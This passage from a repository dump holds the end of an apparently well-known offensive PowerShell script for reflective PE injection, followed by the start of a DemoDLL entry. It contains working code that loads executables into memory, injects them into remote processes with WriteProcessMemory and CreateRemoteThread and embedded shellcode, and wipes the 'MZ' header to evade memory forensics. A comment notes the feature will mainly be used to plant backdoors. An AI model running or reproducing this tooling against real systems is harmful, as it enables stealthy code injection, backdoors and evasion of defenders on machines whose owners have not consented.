$Win32Functions.memcpy.Invoke($Info[0], $Info[1], [UInt64]$Info[2]) | Out-Null\n\n            $Win32Functions.VirtualProtect.Invoke($Info[0], [UInt32]$Info[2], [UInt32]$OldProtectFlag, [Ref]$OldProtectFlag) | Out-Null\n        }\n    }\n\n\n    #####################################\n    ##########    FUNCTIONS   ###########\n    #####################################\n    Function Get-MemoryProcAddress\n    {\n        Param(\n        [Parameter(Position = 0, Mandatory = $true)]\n        [IntPtr]\n        $PEHandle,\n\n        [Parameter(Position = 1, Mandatory = $true)]\n        [String]\n        $FunctionName\n        )\n\n        $Win32Types = Get-Win32Types\n        $Win32Constants = Get-Win32Constants\n        $PEInfo = Get-PEDetailedInfo -PEHandle $PEHandle -Win32Types $Win32Types -Win32Constants $Win32Constants\n\n        #Get the export table\n        if ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.ExportTable.Size -eq 0)\n        {\n            return [IntPtr]::Zero\n        }\n        $ExportTablePtr = Add-SignedIntAsUnsigned ($PEHandle) ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.ExportTable.VirtualAddress)\n        $ExportTable = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ExportTablePtr, [Type]$Win32Types.IMAGE_EXPORT_DIRECTORY)\n\n        for ($i = 0; $i -lt $ExportTable.NumberOfNames; $i++)\n        {\n            #AddressOfNames is an array of pointers to strings of the names of the functions exported\n            $NameOffsetPtr = Add-SignedIntAsUnsigned ($PEHandle) ($ExportTable.AddressOfNames + ($i * [System.Runtime.InteropServices.Marshal]::SizeOf([Type][UInt32])))\n            $NamePtr = Add-SignedIntAsUnsigned ($PEHandle) ([System.Runtime.InteropServices.Marshal]::PtrToStructure($NameOffsetPtr, [Type][UInt32]))\n            $Name = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi($NamePtr)\n\n            if ($Name -ceq $FunctionName)\n            {\n                #AddressOfNameOrdinals is a table which contains points to a WORD which is the index in to AddressOfFunctions\n                #    which contains the offset of the function in to the DLL\n                $OrdinalPtr = Add-SignedIntAsUnsigned ($PEHandle) ($ExportTable.AddressOfNameOrdinals + ($i * [System.Runtime.InteropServices.Marshal]::SizeOf([Type][UInt16])))\n                $FuncIndex = [System.Runtime.InteropServices.Marshal]::PtrToStructure($OrdinalPtr, [Type][UInt16])\n                $FuncOffsetAddr = Add-SignedIntAsUnsigned ($PEHandle) ($ExportTable.AddressOfFunctions + ($FuncIndex * [System.Runtime.InteropServices.Marshal]::SizeOf([Type][UInt32])))\n                $FuncOffset = [System.Runtime.InteropServices.Marshal]::PtrToStructure($FuncOffsetAddr, [Type][UInt32])\n                return Add-SignedIntAsUnsigned ($PEHandle) ($FuncOffset)\n            }\n        }\n\n        return [IntPtr]::Zero\n    }\n\n\n    Function Invoke-MemoryLoadLibrary\n    {\n        Param(\n        [Parameter( Position = 0, Mandatory = $true )]\n        [Byte[]]\n        $PEBytes,\n\n        [Parameter(Position = 1, Mandatory = $false)]\n        [String]\n        $ExeArgs,\n\n        [Parameter(Position = 2, Mandatory = $false)]\n        [IntPtr]\n        $RemoteProcHandle,\n\n        [Parameter(Position = 3)]\n        [Bool]\n        $ForceASLR = $false\n        )\n\n        $PtrSize = [System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr])\n\n        #Get Win32 constants and functions\n        $Win32Constants = Get-Win32Constants\n        $Win32Functions = Get-Win32Functions\n        $Win32Types = Get-Win32Types\n\n        $RemoteLoading = $false\n        if (($RemoteProcHandle -ne $null) -and ($RemoteProcHandle -ne [IntPtr]::Zero))\n        {\n            $RemoteLoading = $true\n        }\n\n        #Get basic PE information\n        Write-Verbose \"Getting basic PE information from the file\"\n        $PEInfo = Get-PEBasicInfo -PEBytes $PEBytes -Win32Types $Win32Types\n        $OriginalImageBase = $PEInfo.OriginalImageBase\n        $NXCompatible = $true\n        if (([Int] $PEInfo.DllCharacteristics -band $Win32Constants.IMAGE_DLLCHARACTERISTICS_NX_COMPAT) -ne $Win32Constants.IMAGE_DLLCHARACTERISTICS_NX_COMPAT)\n        {\n            Write-Warning \"PE is not compatible with DEP, might cause issues\" -WarningAction Continue\n            $NXCompatible = $false\n        }\n\n        #Verify that the PE and the current process are the same bits (32bit or 64bit)\n        $Process64Bit = $true\n        if ($RemoteLoading -eq $true)\n        {\n            $Kernel32Handle = $Win32Functions.GetModuleHandle.Invoke(\"kernel32.dll\")\n            $Result = $Win32Functions.GetProcAddress.Invoke($Kernel32Handle, \"IsWow64Process\")\n            if ($Result -eq [IntPtr]::Zero)\n            {\n                Throw \"Couldn't locate IsWow64Process function to determine if target process is 32bit or 64bit\"\n            }\n\n            [Bool]$Wow64Process = $false\n            $Success = $Win32Functions.IsWow64Process.Invoke($RemoteProcHandle, [Ref]$Wow64Process)\n            if ($Success -eq $false)\n            {\n                Throw \"Call to IsWow64Process failed\"\n            }\n\n            if (($Wow64Process -eq $true) -or (($Wow64Process -eq $false) -and ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) -eq 4)))\n            {\n                $Process64Bit = $false\n            }\n\n            #PowerShell needs to be same bit as the PE being loaded for IntPtr to work correctly\n            $PowerShell64Bit = $true\n            if ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) -ne 8)\n            {\n                $PowerShell64Bit = $false\n            }\n            if ($PowerShell64Bit -ne $Process64Bit)\n            {\n                throw \"PowerShell must be same architecture (x86/x64) as PE being loaded and remote process\"\n            }\n        }\n        else\n        {\n            if ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) -ne 8)\n            {\n                $Process64Bit = $false\n            }\n        }\n        if ($Process64Bit -ne $PEInfo.PE64Bit)\n        {\n            Throw \"PE platform doesn't match the architecture of the process it is being loaded in (32/64bit)\"\n        }\n\n        #Allocate memory and write the PE to memory. If the PE supports ASLR, allocate to a random memory address\n        Write-Verbose \"Allocating memory for the PE and write its headers to memory\"\n\n        #ASLR check\n        [IntPtr]$LoadAddr = [IntPtr]::Zero\n        $PESupportsASLR = ([Int] $PEInfo.DllCharacteristics -band $Win32Constants.IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE) -eq $Win32Constants.IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE\n        if ((-not $ForceASLR) -and (-not $PESupportsASLR))\n        {\n            Write-Warning \"PE file being reflectively loaded is not ASLR compatible. If the loading fails, try restarting PowerShell and trying again OR try using the -ForceASLR flag (could cause crashes)\" -WarningAction Continue\n            [IntPtr]$LoadAddr = $OriginalImageBase\n        }\n        elseif ($ForceASLR -and (-not $PESupportsASLR))\n        {\n            Write-Verbose \"PE file doesn't support ASLR but -ForceASLR is set. Forcing ASLR on the PE file. This could result in a crash.\"\n        }\n\n        if ($ForceASLR -and $RemoteLoading)\n        {\n            Write-Error \"Cannot use ForceASLR when loading in to a remote process.\" -ErrorAction Stop\n        }\n        if ($RemoteLoading -and (-not $PESupportsASLR))\n        {\n            Write-Error \"PE doesn't support ASLR. Cannot load a non-ASLR PE in to a remote process\" -ErrorAction Stop\n        }\n\n        $PEHandle = [IntPtr]::Zero              #This is where the PE is allocated in PowerShell\n        $EffectivePEHandle = [IntPtr]::Zero     #This is the address the PE will be loaded to. If it is loaded in PowerShell, this equals $PEHandle. If it is loaded in a remote process, this is the address in the remote process.\n        if ($RemoteLoading -eq $true)\n        {\n            #Allocate space in the remote process, and also allocate space in PowerShell. The PE will be setup in PowerShell and copied to the remote process when it is setup\n            $PEHandle = $Win32Functions.VirtualAlloc.Invoke([IntPtr]::Zero, [UIntPtr]$PEInfo.SizeOfImage, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE)\n\n            #todo, error handling needs to delete this memory if an error happens along the way\n            $EffectivePEHandle = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, $LoadAddr, [UIntPtr]$PEInfo.SizeOfImage, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_EXECUTE_READWRITE)\n            if ($EffectivePEHandle -eq [IntPtr]::Zero)\n            {\n                Throw \"Unable to allocate memory in the remote process. If the PE being loaded doesn't support ASLR, it could be that the requested base address of the PE is already in use\"\n            }\n        }\n        else\n        {\n            if ($NXCompatible -eq $true)\n            {\n                $PEHandle = $Win32Functions.VirtualAlloc.Invoke($LoadAddr, [UIntPtr]$PEInfo.SizeOfImage, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_READWRITE)\n            }\n            else\n            {\n                $PEHandle = $Win32Functions.VirtualAlloc.Invoke($LoadAddr, [UIntPtr]$PEInfo.SizeOfImage, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_EXECUTE_READWRITE)\n            }\n            $EffectivePEHandle = $PEHandle\n        }\n\n        [IntPtr]$PEEndAddress = Add-SignedIntAsUnsigned ($PEHandle) ([Int64]$PEInfo.SizeOfImage)\n        if ($PEHandle -eq [IntPtr]::Zero)\n        {\n            Throw \"VirtualAlloc failed to allocate memory for PE. If PE is not ASLR compatible, try running the script in a new PowerShell process (the new PowerShell process will have a different memory layout, so the address the PE wants might be free).\"\n        }\n        [System.Runtime.InteropServices.Marshal]::Copy($PEBytes, 0, $PEHandle, $PEInfo.SizeOfHeaders) | Out-Null\n\n\n        #Now that the PE is in memory, get more detailed information about it\n        Write-Verbose \"Getting detailed PE information from the headers loaded in memory\"\n        $PEInfo = Get-PEDetailedInfo -PEHandle $PEHandle -Win32Types $Win32Types -Win32Constants $Win32Constants\n        $PEInfo | Add-Member -MemberType NoteProperty -Name EndAddress -Value $PEEndAddress\n        $PEInfo | Add-Member -MemberType NoteProperty -Name EffectivePEHandle -Value $EffectivePEHandle\n        Write-Verbose \"StartAddress: $(Get-Hex $PEHandle)    EndAddress: $(Get-Hex $PEEndAddress)\"\n\n\n        #Copy each section from the PE in to memory\n        Write-Verbose \"Copy PE sections in to memory\"\n        Copy-Sections -PEBytes $PEBytes -PEInfo $PEInfo -Win32Functions $Win32Functions -Win32Types $Win32Types\n\n\n        #Update the memory addresses hardcoded in to the PE based on the memory address the PE was expecting to be loaded to vs where it was actually loaded\n        Write-Verbose \"Update memory addresses based on where the PE was actually loaded in memory\"\n        Update-MemoryAddresses -PEInfo $PEInfo -OriginalImageBase $OriginalImageBase -Win32Constants $Win32Constants -Win32Types $Win32Types\n\n\n        #The PE we are in-memory loading has DLLs it needs, import those DLLs for it\n        Write-Verbose \"Import DLL's needed by the PE we are loading\"\n        if ($RemoteLoading -eq $true)\n        {\n            Import-DllImports -PEInfo $PEInfo -Win32Functions $Win32Functions -Win32Types $Win32Types -Win32Constants $Win32Constants -RemoteProcHandle $RemoteProcHandle\n        }\n        else\n        {\n            Import-DllImports -PEInfo $PEInfo -Win32Functions $Win32Functions -Win32Types $Win32Types -Win32Constants $Win32Constants\n        }\n\n\n        #Update the memory protection flags for all the memory just allocated\n        if ($RemoteLoading -eq $false)\n        {\n            if ($NXCompatible -eq $true)\n            {\n                Write-Verbose \"Update memory protection flags\"\n                Update-MemoryProtectionFlags -PEInfo $PEInfo -Win32Functions $Win32Functions -Win32Constants $Win32Constants -Win32Types $Win32Types\n            }\n            else\n            {\n                Write-Verbose \"PE being reflectively loaded is not compatible with NX memory, keeping memory as read write execute\"\n            }\n        }\n        else\n        {\n            Write-Verbose \"PE being loaded in to a remote process, not adjusting memory permissions\"\n        }\n\n\n        #If remote loading, copy the DLL in to remote process memory\n        if ($RemoteLoading -eq $true)\n        {\n            [UInt32]$NumBytesWritten = 0\n            $Success = $Win32Functions.WriteProcessMemory.Invoke($RemoteProcHandle, $EffectivePEHandle, $PEHandle, [UIntPtr]($PEInfo.SizeOfImage), [Ref]$NumBytesWritten)\n            if ($Success -eq $false)\n            {\n                Throw \"Unable to write shellcode to remote process memory.\"\n            }\n        }\n\n\n        #Call the entry point, if this is a DLL the entrypoint is the DllMain function, if it is an EXE it is the Main function\n        if ($PEInfo.FileType -ieq \"DLL\")\n        {\n            if ($RemoteLoading -eq $false)\n            {\n                Write-Verbose \"Calling dllmain so the DLL knows it has been loaded\"\n                $DllMainPtr = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.AddressOfEntryPoint)\n                $DllMainDelegate = Get-DelegateType @([IntPtr], [UInt32], [IntPtr]) ([Bool])\n                $DllMain = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DllMainPtr, $DllMainDelegate)\n\n                $DllMain.Invoke($PEInfo.PEHandle, 1, [IntPtr]::Zero) | Out-Null\n            }\n            else\n            {\n                $DllMainPtr = Add-SignedIntAsUnsigned ($EffectivePEHandle) ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.AddressOfEntryPoint)\n\n                if ($PEInfo.PE64Bit -eq $true)\n                {\n                    #Shellcode: CallDllMain.asm\n                    $CallDllMainSC1 = @(0x53, 0x48, 0x89, 0xe3, 0x66, 0x83, 0xe4, 0x00, 0x48, 0xb9)\n                    $CallDllMainSC2 = @(0xba, 0x01, 0x00, 0x00, 0x00, 0x41, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x48, 0xb8)\n                    $CallDllMainSC3 = @(0xff, 0xd0, 0x48, 0x89, 0xdc, 0x5b, 0xc3)\n                }\n                else\n                {\n                    #Shellcode: CallDllMain.asm\n                    $CallDllMainSC1 = @(0x53, 0x89, 0xe3, 0x83, 0xe4, 0xf0, 0xb9)\n                    $CallDllMainSC2 = @(0xba, 0x01, 0x00, 0x00, 0x00, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x50, 0x52, 0x51, 0xb8)\n                    $CallDllMainSC3 = @(0xff, 0xd0, 0x89, 0xdc, 0x5b, 0xc3)\n                }\n                $SCLength = $CallDllMainSC1.Length + $CallDllMainSC2.Length + $CallDllMainSC3.Length + ($PtrSize * 2)\n                $SCPSMem = [System.Runtime.InteropServices.Marshal]::AllocHGlobal($SCLength)\n                $SCPSMemOriginal = $SCPSMem\n\n                Write-BytesToMemory -Bytes $CallDllMainSC1 -MemoryAddress $SCPSMem\n                $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($CallDllMainSC1.Length)\n                [System.Runtime.InteropServices.Marshal]::StructureToPtr($EffectivePEHandle, $SCPSMem, $false)\n                $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)\n                Write-BytesToMemory -Bytes $CallDllMainSC2 -MemoryAddress $SCPSMem\n                $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($CallDllMainSC2.Length)\n                [System.Runtime.InteropServices.Marshal]::StructureToPtr($DllMainPtr, $SCPSMem, $false)\n                $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($PtrSize)\n                Write-BytesToMemory -Bytes $CallDllMainSC3 -MemoryAddress $SCPSMem\n                $SCPSMem = Add-SignedIntAsUnsigned $SCPSMem ($CallDllMainSC3.Length)\n\n                $RSCAddr = $Win32Functions.VirtualAllocEx.Invoke($RemoteProcHandle, [IntPtr]::Zero, [UIntPtr][UInt64]$SCLength, $Win32Constants.MEM_COMMIT -bor $Win32Constants.MEM_RESERVE, $Win32Constants.PAGE_EXECUTE_READWRITE)\n                if ($RSCAddr -eq [IntPtr]::Zero)\n                {\n                    Throw \"Unable to allocate memory in the remote process for shellcode\"\n                }\n\n                $Success = $Win32Functions.WriteProcessMemory.Invoke($RemoteProcHandle, $RSCAddr, $SCPSMemOriginal, [UIntPtr][UInt64]$SCLength, [Ref]$NumBytesWritten)\n                if (($Success -eq $false) -or ([UInt64]$NumBytesWritten -ne [UInt64]$SCLength))\n                {\n                    Throw \"Unable to write shellcode to remote process memory.\"\n                }\n\n                $RThreadHandle = Create-RemoteThread -ProcessHandle $RemoteProcHandle -StartAddress $RSCAddr -Win32Functions $Win32Functions\n                $Result = $Win32Functions.WaitForSingleObject.Invoke($RThreadHandle, 20000)\n                if ($Result -ne 0)\n                {\n                    Throw \"Call to CreateRemoteThread to call GetProcAddress failed.\"\n                }\n\n                $Win32Functions.VirtualFreeEx.Invoke($RemoteProcHandle, $RSCAddr, [UIntPtr][UInt64]0, $Win32Constants.MEM_RELEASE) | Out-Null\n            }\n        }\n        elseif ($PEInfo.FileType -ieq \"EXE\")\n        {\n            #Overwrite GetCommandLine and ExitProcess so we can provide our own arguments to the EXE and prevent it from killing the PS process\n            [IntPtr]$ExeDoneBytePtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(1)\n            [System.Runtime.InteropServices.Marshal]::WriteByte($ExeDoneBytePtr, 0, 0x00)\n            $OverwrittenMemInfo = Update-ExeFunctions -PEInfo $PEInfo -Win32Functions $Win32Functions -Win32Constants $Win32Constants -ExeArguments $ExeArgs -ExeDoneBytePtr $ExeDoneBytePtr\n\n            #If this is an EXE, call the entry point in a new thread. We have overwritten the ExitProcess function to instead ExitThread\n            #   This way the reflectively loaded EXE won't kill the powershell process when it exits, it will just kill its own thread.\n            [IntPtr]$ExeMainPtr = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.AddressOfEntryPoint)\n            Write-Verbose \"Call EXE Main function. Address: $(Get-Hex $ExeMainPtr). Creating thread for the EXE to run in.\"\n\n            $Win32Functions.CreateThread.Invoke([IntPtr]::Zero, [IntPtr]::Zero, $ExeMainPtr, [IntPtr]::Zero, ([UInt32]0), [Ref]([UInt32]0)) | Out-Null\n\n            while($true)\n            {\n                [Byte]$ThreadDone = [System.Runtime.InteropServices.Marshal]::ReadByte($ExeDoneBytePtr, 0)\n                if ($ThreadDone -eq 1)\n                {\n                    Copy-ArrayOfMemAddresses -CopyInfo $OverwrittenMemInfo -Win32Functions $Win32Functions -Win32Constants $Win32Constants\n                    Write-Verbose \"EXE thread has completed.\"\n                    break\n                }\n                else\n                {\n                    Start-Sleep -Seconds 1\n                }\n            }\n        }\n\n        return @($PEInfo.PEHandle, $EffectivePEHandle)\n    }\n\n\n    Function Invoke-MemoryFreeLibrary\n    {\n        Param(\n        [Parameter(Position=0, Mandatory=$true)]\n        [IntPtr]\n        $PEHandle\n        )\n\n        #Get Win32 constants and functions\n        $Win32Constants = Get-Win32Constants\n        $Win32Functions = Get-Win32Functions\n        $Win32Types = Get-Win32Types\n\n        $PEInfo = Get-PEDetailedInfo -PEHandle $PEHandle -Win32Types $Win32Types -Win32Constants $Win32Constants\n\n        #Call FreeLibrary for all the imports of the DLL\n        if ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.ImportTable.Size -gt 0)\n        {\n            [IntPtr]$ImportDescriptorPtr = Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$PEInfo.IMAGE_NT_HEADERS.OptionalHeader.ImportTable.VirtualAddress)\n\n            while ($true)\n            {\n                $ImportDescriptor = [System.Runtime.InteropServices.Marshal]::PtrToStructure($ImportDescriptorPtr, [Type]$Win32Types.IMAGE_IMPORT_DESCRIPTOR)\n\n                #If the structure is null, it signals that this is the end of the array\n                if ($ImportDescriptor.Characteristics -eq 0 `\n                        -and $ImportDescriptor.FirstThunk -eq 0 `\n                        -and $ImportDescriptor.ForwarderChain -eq 0 `\n                        -and $ImportDescriptor.Name -eq 0 `\n                        -and $ImportDescriptor.TimeDateStamp -eq 0)\n                {\n                    Write-Verbose \"Done unloading the libraries needed by the PE\"\n                    break\n                }\n\n                $ImportDllPath = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi((Add-SignedIntAsUnsigned ([Int64]$PEInfo.PEHandle) ([Int64]$ImportDescriptor.Name)))\n                $ImportDllHandle = $Win32Functions.GetModuleHandle.Invoke($ImportDllPath)\n\n                if ($ImportDllHandle -eq $null)\n                {\n                    Write-Warning \"Error getting DLL handle in MemoryFreeLibrary, DLLName: $ImportDllPath. Continuing anyways\" -WarningAction Continue\n                }\n\n                $Success = $Win32Functions.FreeLibrary.Invoke($ImportDllHandle)\n                if ($Success -eq $false)\n                {\n                    Write-Warning \"Unable to free library: $ImportDllPath. Continuing anyways.\" -WarningAction Continue\n                }\n\n                $ImportDescriptorPtr = Add-SignedIntAsUnsigned ($ImportDescriptorPtr) ([System.Runtime.InteropServices.Marshal]::SizeOf([Type]$Win32Types.IMAGE_IMPORT_DESCRIPTOR))\n            }\n        }\n\n        #Call DllMain with process detach\n        Write-Verbose \"Calling dllmain so the DLL knows it is being unloaded\"\n        $DllMainPtr = Add-SignedIntAsUnsigned ($PEInfo.PEHandle) ($PEInfo.IMAGE_NT_HEADERS.OptionalHeader.AddressOfEntryPoint)\n        $DllMainDelegate = Get-DelegateType @([IntPtr], [UInt32], [IntPtr]) ([Bool])\n        $DllMain = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DllMainPtr, $DllMainDelegate)\n\n        $DllMain.Invoke($PEInfo.PEHandle, 0, [IntPtr]::Zero) | Out-Null\n\n\n        $Success = $Win32Functions.VirtualFree.Invoke($PEHandle, [UInt64]0, $Win32Constants.MEM_RELEASE)\n        if ($Success -eq $false)\n        {\n            Write-Warning \"Unable to call VirtualFree on the PE's memory. Continuing anyways.\" -WarningAction Continue\n        }\n    }\n\n\n    Function Main\n    {\n        $Win32Functions = Get-Win32Functions\n        $Win32Types = Get-Win32Types\n        $Win32Constants =  Get-Win32Constants\n\n        $RemoteProcHandle = [IntPtr]::Zero\n\n        #If a remote process to inject in to is specified, get a handle to it\n        if (($ProcId -ne $null) -and ($ProcId -ne 0) -and ($ProcName -ne $null) -and ($ProcName -ne \"\"))\n        {\n            Throw \"Can't supply a ProcId and ProcName, choose one or the other\"\n        }\n        elseif ($ProcName -ne $null -and $ProcName -ne \"\")\n        {\n            $Processes = @(Get-Process -Name $ProcName -ErrorAction SilentlyContinue)\n            if ($Processes.Count -eq 0)\n            {\n                Throw \"Can't find process $ProcName\"\n            }\n            elseif ($Processes.Count -gt 1)\n            {\n                $ProcInfo = Get-Process | Where-Object { $_.Name -eq $ProcName } | Select-Object ProcessName, Id, SessionId\n                Write-Output $ProcInfo\n                Throw \"More than one instance of $ProcName found, please specify the process ID to inject in to.\"\n            }\n            else\n            {\n                $ProcId = $Processes[0].ID\n            }\n        }\n\n        #Just realized that PowerShell launches with SeDebugPrivilege for some reason.. So this isn't needed. Keeping it around just incase it is needed in the future.\n        #If the script isn't running in the same Windows logon session as the target, get SeDebugPrivilege\n#       if ((Get-Process -Id $PID).SessionId -ne (Get-Process -Id $ProcId).SessionId)\n#       {\n#           Write-Verbose \"Getting SeDebugPrivilege\"\n#           Enable-SeDebugPrivilege -Win32Functions $Win32Functions -Win32Types $Win32Types -Win32Constants $Win32Constants\n#       }\n\n        if (($ProcId -ne $null) -and ($ProcId -ne 0))\n        {\n            $RemoteProcHandle = $Win32Functions.OpenProcess.Invoke(0x001F0FFF, $false, $ProcId)\n            if ($RemoteProcHandle -eq [IntPtr]::Zero)\n            {\n                Throw \"Couldn't obtain the handle for process ID: $ProcId\"\n            }\n\n            Write-Verbose \"Got the handle for the remote process to inject in to\"\n        }\n\n\n        #Load the PE reflectively\n        Write-Verbose \"Calling Invoke-MemoryLoadLibrary\"\n        $PEHandle = [IntPtr]::Zero\n        if ($RemoteProcHandle -eq [IntPtr]::Zero)\n        {\n            $PELoadedInfo = Invoke-MemoryLoadLibrary -PEBytes $PEBytes -ExeArgs $ExeArgs -ForceASLR $ForceASLR\n        }\n        else\n        {\n            $PELoadedInfo = Invoke-MemoryLoadLibrary -PEBytes $PEBytes -ExeArgs $ExeArgs -RemoteProcHandle $RemoteProcHandle -ForceASLR $ForceASLR\n        }\n        if ($PELoadedInfo -eq [IntPtr]::Zero)\n        {\n            Throw \"Unable to load PE, handle returned is NULL\"\n        }\n\n        $PEHandle = $PELoadedInfo[0]\n        $RemotePEHandle = $PELoadedInfo[1] #only matters if you loaded in to a remote process\n\n\n        #Check if EXE or DLL. If EXE, the entry point was already called and we can now return. If DLL, call user function.\n        $PEInfo = Get-PEDetailedInfo -PEHandle $PEHandle -Win32Types $Win32Types -Win32Constants $Win32Constants\n        if (($PEInfo.FileType -ieq \"DLL\") -and ($RemoteProcHandle -eq [IntPtr]::Zero))\n        {\n            #########################################\n            ### YOUR CODE GOES HERE\n            #########################################\n            switch ($FuncReturnType)\n            {\n                'WString' {\n                    Write-Verbose \"Calling function with WString return type\"\n                    [IntPtr]$WStringFuncAddr = Get-MemoryProcAddress -PEHandle $PEHandle -FunctionName \"WStringFunc\"\n                    if ($WStringFuncAddr -eq [IntPtr]::Zero)\n                    {\n                        Throw \"Couldn't find function address.\"\n                    }\n                    $WStringFuncDelegate = Get-DelegateType @() ([IntPtr])\n                    $WStringFunc = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WStringFuncAddr, $WStringFuncDelegate)\n                    [IntPtr]$OutputPtr = $WStringFunc.Invoke()\n                    $Output = [System.Runtime.InteropServices.Marshal]::PtrToStringUni($OutputPtr)\n                    Write-Output $Output\n                }\n\n                'String' {\n                    Write-Verbose \"Calling function with String return type\"\n                    [IntPtr]$StringFuncAddr = Get-MemoryProcAddress -PEHandle $PEHandle -FunctionName \"StringFunc\"\n                    if ($StringFuncAddr -eq [IntPtr]::Zero)\n                    {\n                        Throw \"Couldn't find function address.\"\n                    }\n                    $StringFuncDelegate = Get-DelegateType @() ([IntPtr])\n                    $StringFunc = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($StringFuncAddr, $StringFuncDelegate)\n                    [IntPtr]$OutputPtr = $StringFunc.Invoke()\n                    $Output = [System.Runtime.InteropServices.Marshal]::PtrToStringAnsi($OutputPtr)\n                    Write-Output $Output\n                }\n\n                'Void' {\n                    Write-Verbose \"Calling function with Void return type\"\n                    [IntPtr]$VoidFuncAddr = Get-MemoryProcAddress -PEHandle $PEHandle -FunctionName \"VoidFunc\"\n                    if ($VoidFuncAddr -eq [IntPtr]::Zero)\n                    {\n                        Throw \"Couldn't find function address.\"\n                    }\n                    $VoidFuncDelegate = Get-DelegateType @() ([Void])\n                    $VoidFunc = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VoidFuncAddr, $VoidFuncDelegate)\n                    $VoidFunc.Invoke() | Out-Null\n                }\n            }\n            #########################################\n            ### END OF YOUR CODE\n            #########################################\n        }\n        #For remote DLL injection, call a void function which takes no parameters\n        elseif (($PEInfo.FileType -ieq \"DLL\") -and ($RemoteProcHandle -ne [IntPtr]::Zero))\n        {\n            $VoidFuncAddr = Get-MemoryProcAddress -PEHandle $PEHandle -FunctionName \"VoidFunc\"\n            if (($VoidFuncAddr -eq $null) -or ($VoidFuncAddr -eq [IntPtr]::Zero))\n            {\n                Throw \"VoidFunc couldn't be found in the DLL\"\n            }\n\n            $VoidFuncAddr = Sub-SignedIntAsUnsigned $VoidFuncAddr $PEHandle\n            $VoidFuncAddr = Add-SignedIntAsUnsigned $VoidFuncAddr $RemotePEHandle\n\n            #Create the remote thread, don't wait for it to return.. This will probably mainly be used to plant backdoors\n            $Null = Create-RemoteThread -ProcessHandle $RemoteProcHandle -StartAddress $VoidFuncAddr -Win32Functions $Win32Functions\n        }\n\n        #Don't free a library if it is injected in a remote process or if it is an EXE.\n        #Note that all DLL's loaded by the EXE will remain loaded in memory.\n        if ($RemoteProcHandle -eq [IntPtr]::Zero -and $PEInfo.FileType -ieq \"DLL\")\n        {\n            Invoke-MemoryFreeLibrary -PEHandle $PEHandle\n        }\n        else\n        {\n            #Delete the PE file from memory.\n            $Success = $Win32Functions.VirtualFree.Invoke($PEHandle, [UInt64]0, $Win32Constants.MEM_RELEASE)\n            if ($Success -eq $false)\n            {\n                Write-Warning \"Unable to call VirtualFree on the PE's memory. Continuing anyways.\" -WarningAction Continue\n            }\n        }\n\n        Write-Verbose \"Done!\"\n    }\n\n    Main\n}\n\n#Main function to either run the script locally or remotely\nFunction Main\n{\n    if (($PSCmdlet.MyInvocation.BoundParameters[\"Debug\"] -ne $null) -and $PSCmdlet.MyInvocation.BoundParameters[\"Debug\"].IsPresent)\n    {\n        $DebugPreference  = \"Continue\"\n    }\n\n    Write-Verbose \"PowerShell ProcessID: $PID\"\n\n    #Verify the image is a valid PE file\n    $e_magic = ($PEBytes[0..1] | ForEach-Object {[Char] $_}) -join ''\n\n    if ($e_magic -ne 'MZ')\n    {\n        throw 'PE is not a valid PE file.'\n    }\n\n    if (-not $DoNotZeroMZ) {\n        # Remove 'MZ' from the PE file so that it cannot be detected by .imgscan in WinDbg\n        # TODO: Investigate how much of the header can be destroyed, I'd imagine most of it can be.\n        $PEBytes[0] = 0\n        $PEBytes[1] = 0\n    }\n\n    #Add a \"program name\" to exeargs, just so the string looks as normal as possible (real args start indexing at 1)\n    if ($ExeArgs -ne $null -and $ExeArgs -ne '')\n    {\n        $ExeArgs = \"ReflectiveExe $ExeArgs\"\n    }\n    else\n    {\n        $ExeArgs = \"ReflectiveExe\"\n    }\n\n    if ($ComputerName -eq $null -or $ComputerName -imatch \"^\\s*$\")\n    {\n        Invoke-Command -ScriptBlock $RemoteScriptBlock -ArgumentList @($PEBytes, $FuncReturnType, $ProcId, $ProcName,$ForceASLR)\n    }\n    else\n    {\n        Invoke-Command -ScriptBlock $RemoteScriptBlock -ArgumentList @($PEBytes, $FuncReturnType, $ProcId, $ProcName,$ForceASLR) -ComputerName $ComputerName\n    }\n}\n\nMain\n}"
  },
  {
    "path": "CodeExecution/Invoke-ReflectivePEInjection_Resources/DemoDLL/DemoDLL/DemoDLL.cpp",
